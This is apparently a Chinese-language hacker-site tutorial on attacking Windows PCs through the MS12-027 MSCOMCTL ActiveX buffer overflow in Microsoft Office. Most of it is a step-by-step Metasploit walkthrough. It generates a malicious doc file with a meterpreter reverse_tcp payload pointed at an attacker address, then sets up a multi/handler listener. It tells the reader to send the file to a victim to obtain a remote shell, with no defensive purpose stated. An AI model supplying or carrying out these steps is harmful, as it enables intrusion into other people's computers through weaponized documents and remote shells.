此模块利用MSCOMCTL.OCX中的堆栈缓冲区溢出。它使用恶意RTF嵌入2012年4月在野外开发的特制MSComctlLib.ListViewCtrl.2控件。该模块以Office 2007和Office 2010目标为目标。Office 2010上的DEP / ASLR旁路是由Abysssec提出的Ikazuchi ROP链完成的。这个链使用“msgr3en.dll”,它将在办公室加载后加载,因此恶意文件必须通过“文件/打开”加载才能实现利用。
利用目标
Windows XP SP 2,3上的MS Office 2007
Windows 7 / SP1上的MS Office 2010
需求
攻击者:Backtrack 5
受害者PC:Windows XP
打开回溯终端类型 msfconsole
现在输入 use exploit / windows / fileformat / ms12_027_mscomctl_bof
msf exploit(ms12_027_mscomctl_bof)> set payload windows / meterpreter / reverse_tcp
msf exploit(ms12_027_mscomctl_bof)> set lhost 192.168.1.3(本地主机的IP)
msf exploit(ms12_027_mscomctl_bof)> exploit
在我们成功生成恶意doc文件后,它将存储在您的本地计算机上
/root/.msf4/local/msf.doc
现在我们需要设置一个监听器来处理攻击成功执行时受害者发送的反向连接。
使用exploit / multi / handler
设置有效负载windows / meterpreter / reverse_tcp
设置lhost 192.168.1.3
利用现在,只要下载并打开它们,就会将msf.doc文件发送给受害者。现在您可以访问受害计算机上的meterpreter shell。
本文标题:远程Windows PC用Microsoft Office MS12-027 MSCOMCTL ActiveX缓冲区溢出
本文作者:小皮
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t3108.html